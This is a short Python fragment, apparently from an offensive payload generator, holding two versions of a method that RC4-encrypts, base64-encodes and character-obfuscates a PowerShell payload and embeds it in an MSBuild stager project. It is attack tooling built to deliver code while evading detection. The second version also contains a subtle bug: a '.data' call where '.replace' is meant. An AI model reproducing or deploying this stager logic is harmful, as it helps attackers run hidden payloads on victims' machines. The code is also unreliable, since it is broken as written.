def generate_msbuild(self, ps): msbuild = Utils.load_powershell_script("../bin/stager.csproj", 999) rc4_key = RC4.gen_rc4_key(32) hex_rc4_key = RC4.format_rc4_key(rc4_key) rc4 = RC4(rc4_key) data = base64.b64encode(rc4.crypt(ps)) return msbuild.replace("[PAYLOAD]", data).replace("[KEY]", hex_rc4_key)
def generate_msbuild(self, ps): msbuild = Utils.load_powershell_script("../bin/stager.csproj", 999) rc4_key = RC4.gen_rc4_key(32) hex_rc4_key = RC4.format_rc4_key(rc4_key) rc4 = RC4(rc4_key) data = base64.b64encode(rc4.crypt(ps)) pattern1 = self.gen_pattern("#!@$%?&/-~") pattern2 = self.gen_pattern(",.<>)(*[]{}+`") data = data.replace("m", pattern1).data("V", pattern2) return msbuild.replace("[PAYLOAD]", data).replace("[KEY]", hex_rc4_key).replace( "[PATTERN_1]", pattern1).replace("[PATTERN_2]", pattern2)